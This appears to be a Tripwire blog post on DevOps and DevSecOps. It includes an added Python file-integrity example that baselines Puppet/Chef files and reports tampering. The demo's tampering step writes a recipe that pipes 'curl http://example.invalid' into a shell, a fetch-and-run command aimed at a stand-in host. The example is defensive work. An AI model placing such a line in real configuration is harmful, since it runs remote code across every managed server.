
DevOps: A Working Definition
So, what do we mean by “DevOps”? The name itself implies a combination of “development” and “operations,” but it involves a lot more than sticking two departments together under one umbrella. It is a culture and a process that has a lot in common with Agile, only more extreme in some ways. Instead of a release schedule measured in months or weeks, a DevOps team may release a new version 10, 50, 100, or more times every single day, with the developers who write the code deploying it directly to production themselves. This is made possible by automating every step of the release pipeline. DevOps teams rely on a variety of tools to help them deploy code faster, and in many cases they write or extend those tools themselves. Continuous integration tools like Jenkins ensure that every code change triggers a fresh product build. Unit tests and acceptance tests are run against each new build to verify that it contains no regressions that would cause problems in production. Configuration management tools like Puppet and Chef let you define your server infrastructure as code, so that new servers can be provisioned in minutes instead of days. Performance statistics and the results of A/B experiments on users feed back into the next round of improvements, and the cycle begins all over again.

Benefits of DevOps
One of the most obvious benefits is that your features make it to market faster. Rather than waiting for a release scheduled six months out, a new feature can be deployed the day development on it is finished. So, all else being equal, a company using a DevOps approach could always be six months ahead of a competitor that is not. Customers get more features sooner, and most developers are happier working with the latest tools and techniques anyway. According to the Puppet 2017 State of DevOps Report, the highest-performing teams surveyed had a change failure rate five times lower than the lowest performers, and when a failure did cause downtime, they recovered from it 96 times faster. It seems counterintuitive, but moving fast and breaking things eventually leads to a lot less failure and downtime: small, frequent changes are easier to test, easier to review, and far easier to roll back than a six-month batch of changes landing all at once.

Coupling DevOps and Security
So, how does security fit into all this? You may have noticed that there isn’t a “security” stage in the DevOps process, and security isn’t one of the guiding principles or techniques usually mentioned in the context of DevOps. If you think the idea of DevOps would give your IT operations team heartburn, try talking to your IT security team about it. (You might want to make sure they’re sitting down first and that there are no sharp objects nearby.) A DevOps workflow does not leave room for the extended planning and auditing that normally accompanies security operations. You cannot deploy 50 times a day if you have to wait for 50 meetings of a change advisory board to approve each change. Stopping for approval or auditing breaks the cycle and prevents the rapid improvement that produces all of the positive effects of DevOps.

In a 2017 DevSecOps Community survey, more than half of respondents either somewhat or strongly agreed that “security is an inhibitor to DevOps agility.” So, if we can’t have both security and DevOps agility, it seems we have to give one of them up: either keep the rapid DevOps improvement and drop security considerations, or refuse to compromise on security standards and miss out on all the benefits of DevOps.
How Tripwire Can Help
If you are going to implement DevSecOps, then Tripwire would like to be part of your solution. An important property of DevSecOps tools is that their APIs let you automate security assessments as part of your workflow. Many of Tripwire's products also ship command-line tools that make it easier to drive those APIs without writing your own clients. You can also engage our professional services team if you don’t want to build all of the integrations yourself.

Tripwire Enterprise can monitor your critical DevOps infrastructure servers and evaluate them for compliance with hardened security standards. It can also monitor critical files such as the manifests, recipes and scripts on Puppet and Chef servers, since a change to one of those files changes every server they manage. Tripwire Enterprise and Tripwire IP360 can be used to evaluate the security posture of systems before they go to production and to keep monitoring them for deviations afterwards. At the same time, Tripwire Log Center can alert on suspicious security events, such as a terminated employee logging in and modifying files.

Another specific way Tripwire integrates with DevSecOps is through Puppet and Chef themselves. We have Puppet modules and Chef cookbooks for deploying and managing Tripwire Enterprise agents. These let you install, configure or upgrade agents automatically across your entire infrastructure at once. They can manage both the legacy Java-based Tripwire Enterprise agent and the next-generation Axon agent, and they can even help migrate your environment from one kind of agent to the other. They are available now on the Puppet Forge and the Chef Supermarket, and the source code is also available on GitHub under an open-source license.

Recapping DevSecOps
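To make the file-monitoring idea concrete, here is a small, added example of integrity monitoring over configuration-management content. It is illustrative code written for this page, not Tripwire Enterprise's own implementation: it records a SHA-256 digest, size and permission mode for every file under a directory standing in for a Puppet or Chef server's manifests, signs that baseline with an HMAC so the baseline file itself cannot be quietly edited, and then reports files that were added, removed or modified. The sample files, the tampering steps and the HMAC key are all constructed for the demonstration; in practice the key and the signed baseline would be kept off the monitored host.

```python
"""Minimal file-integrity baseline for Puppet/Chef content (added example, not Tripwire code)."""
import hashlib
import hmac
import json
import os
import stat
import tempfile
from pathlib import Path


def snapshot(root: Path) -> dict:
    """Return {relative_path: {sha256, size, mode}} for every regular file under root.

    Symlinks are skipped so a link planted at a monitored path cannot make the
    snapshot hash some unrelated file instead of reporting the link itself.
    """
    entries = {}
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue
        st = path.stat()
        entries[path.relative_to(root).as_posix()] = {
            "sha256": hashlib.sha256(path.read_bytes()).hexdigest(),
            "size": st.st_size,
            "mode": stat.S_IMODE(st.st_mode),
        }
    return entries


def sign_baseline(entries: dict, key: bytes) -> str:
    """Serialise the baseline with an HMAC-SHA256 tag over its canonical JSON form."""
    body = json.dumps(entries, sort_keys=True)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return json.dumps({"entries": entries, "hmac": tag})


def load_baseline(blob: str, key: bytes) -> dict:
    """Verify the HMAC before trusting the baseline; an edited baseline is rejected."""
    doc = json.loads(blob)
    body = json.dumps(doc["entries"], sort_keys=True)
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, doc["hmac"]):
        raise ValueError("baseline HMAC mismatch: baseline file was altered")
    return doc["entries"]


def compare(baseline: dict, current: dict) -> dict:
    """Report paths added, removed, or changed in content, size or mode since the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = {}
    for name in sorted(set(baseline) & set(current)):
        changed = [k for k in ("sha256", "size", "mode") if baseline[name][k] != current[name][k]]
        if changed:
            modified[name] = changed
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> dict:
    """Build a constructed manifest tree, baseline it, tamper with it, and return the report."""
    key = b"demo-only-key-store-the-real-one-off-host"  # assumption: throwaway key for the example
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "manifests").mkdir()
        (root / "manifests" / "site.pp").write_text("node default { include base }\n")
        (root / "recipes").mkdir()
        (root / "recipes" / "default.rb").write_text("package 'openssh-server'\n")
        blob = sign_baseline(snapshot(root), key)

        # Constructed tampering: edit a manifest, drop in a new recipe, loosen a file mode.
        (root / "manifests" / "site.pp").write_text("node default { include base; include backdoor }\n")
        (root / "recipes" / "evil.rb").write_text("execute 'curl http://example.invalid | sh'\n")
        os.chmod(root / "recipes" / "default.rb", 0o777)

        return compare(load_baseline(blob, key), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Running the script prints the new `recipes/evil.rb`, the content and size change to `manifests/site.pp`, and the mode change on `recipes/default.rb`. Feeding the same report into an alerting pipeline is the part a product like Log Center handles; the check itself is what matters for the deploy gate, because a modified manifest on the Puppet master is a change to every node it manages.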
There are a lot of advantages to taking a DevOps approach, from faster time to market to more flexibility and resiliency. By integrating security into every stage of DevOps from the beginning, it’s possible to get the advantages of DevOps without sacrificing your organization’s security. If you have a favorite DevOps tool that you would like to see Tripwire integrate with better, please let us know in the comments. If you’re already using DevOps tools, I hope this gave you some ideas of how Tripwire can work with your tools and process. Also, Tripwire is hosting a special webcast on August 21 titled "Leading a DevOps Transformation". Join us and our guest presenters to learn how to help your organization achieve higher levels of performance whilst ensuring security is a continuous aspect of the process. You can register here or click on the image below.
